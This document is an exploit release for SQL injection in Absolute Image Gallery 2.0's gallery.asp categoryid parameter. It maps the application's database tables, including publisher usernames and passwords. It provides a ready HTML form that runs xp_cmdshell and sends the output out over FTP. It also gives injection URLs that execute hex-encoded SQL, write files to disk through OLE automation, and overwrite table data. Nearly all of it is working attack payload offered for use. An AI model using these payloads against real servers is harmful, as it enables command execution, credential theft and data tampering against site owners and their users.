Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit
Type :
SQL Injection
Release Date :
{2007-03-15}
Product / Vendor :
Absolute Image Gallery
http://www.xigla.com/absoluteig/
Bug :
http://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj-
------------------------------------------------------------------------
---------------------------------------------------------------------
Script Table/Colon Name :
------------------------------------------------------------------------
---------------------------------------------------------------------
Table Name : articlefiles
fileid
filetitle
filename
articleid
filetype
filecomment
urlfile
------------------------------------------------------------------------
---------------------------------------------------------------------
Table Name : articles
articleid
posted
lastupdate
headline
headlinedate
startdate
enddate
source
summary
articleurl
article
status
autoformat
publisherid
clicks
editor
relatedid
------------------------------------------------------------------------
---------------------------------------------------------------------
Table Name : iArticlesZones
articleid
zoneid
------------------------------------------------------------------------
---------------------------------------------------------------------
Table Name : plugins
pluginid
pplname
pplfile
ppldescription
------------------------------------------------------------------------
---------------------------------------------------------------------
Table Name : PPL1reviews
reviewid
articleid
name
reviewdate
review
comments
isannonymous
------------------------------------------------------------------------
---------------------------------------------------------------------
Table Name : publishers
publisherid
name
username
password
email
additional
plevel
------------------------------------------------------------------------
---------------------------------------------------------------------
Table Name : publisherszones
publisherid
zoneid
------------------------------------------------------------------------
---------------------------------------------------------------------
Table Name : xlaAIGcategories
categoryid
catname
catdesc
supercatid
lastupdate
catpath
images
allowupload
------------------------------------------------------------------------
---------------------------------------------------------------------
Table Name : xlaAIGimages
imageid
imagename
imagedesc
imagefile
imagedate
imagesize
totalrating
totalreviews
hits
categoryid
status
uploadedby
additionalinfo
embedhtml
keywords
copyright
credit
source
datecreated
email
infourl
------------------------------------------------------------------------
---------------------------------------------------------------------
Table Name : xlaAIGpostcards
dateposted
postcardid
imageid
bgcolor
bordercolor
fonttype
fontcolor
recipientname
recipientemail
greeting
bgsound
sendername
senderemail
sendermsg
------------------------------------------------------------------------
---------------------------------------------------------------------
Table Name : zones
zonename
description
template
articlespz
zonefont
fontsize
fontcolor
showsource
showsummary
showdates
showtn
textalign
displayhoriz
cellcolor
targetframe
------------------------------------------------------------------------
---------------------------------------------------------------------
MSSQL CMD Injection Exploit(For DBO Users) :
<title>Absolute Image Gallery MSSQL CMD Injection Exploit</title>
<body bgcolor="#000000">
<form name="Form" method="get" action="http://localhost/script/gallery.asp">
<center><font face="Verdana" size="2" color="#FF0000"><b>Absolute Image Gallery MSSQL CMD Injection Exploit</b></font><br><br></center>
<center><font face="Verdana" size="1" color="#00FF00"><b>Note : For DBO Users</b></font><br><br></center>
<center><font face="Verdana" size="1" color="#00FF00"><b>Example :</b></font><br><br></center>
<tr>
<center><img src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br>
<center><td align="right"><font face="Arial" size="1" color="#00FF00">Command Exec :</td>
<td> </td>
<td><input name="action=viewimage&categoryid=-1" type="text" value=";exec master..xp_cmdshell 'dir c: > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+
*+from+cmd';--" class="inputbox" style="color: #000000" style="width:300px; "></td>
</tr>
<tr>
<td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td>
<td> </td>
<td>
<select name="">
<option value="0">(CMD)</option>
</select> <br><br>
<input type="submit" value="Apply"></center>
</td>
</tr>
</table>
</form>
<center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font>
<br>
<font face="Verdana" size="2" color="#FF0000"><b>UniquE (at) UniquE-Key (dot) ORG [email concealed]</b></font>
<br>
<font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>
------------------------------------------------------------------------
---------------------------------------------------------------------
Code Injection(For DBO Users) :
Add Table : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;Creat
e+table+code+(txt+varchar(8000),id+int);--
ASCII Code Add Database : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;decla
re+@q+varchar(8000)+select+@q=0x696E7365727420696E746F2066736F3737372874
78742C6964292076616C7565732827272C3129+exec(@q);--
Code Injection : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;decla
re+@txt+varchar(8000);select+@txt+=+(select+top+1+txt+from+code+where+id
+=+1);declare+@o+int,+@f+int,+@t+int,+@ret+int+exec+sp_oacreate+'scripti
ng.filesystemobject',+@o+out+exec+sp_oamethod+@o,+'createtextfile',+@f+o
ut,+'c:/host',+1+exec+@ret+=+sp_oamethod+@f,+'writeline',+NULL,+@txt;--
------------------------------------------------------------------------
---------------------------------------------------------------------
UPDATE(ALL users) :
http://localhost/script/gallery.asp?action=viewimage&categoryid=-1 UPDATE table SET colon = 'x';--
------------------------------------------------------------------------
---------------------------------------------------------------------
Tested :
Absolute Image Gallery 2.0
Vulnerable :
Absolute Image Gallery 2.0
Author :
UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org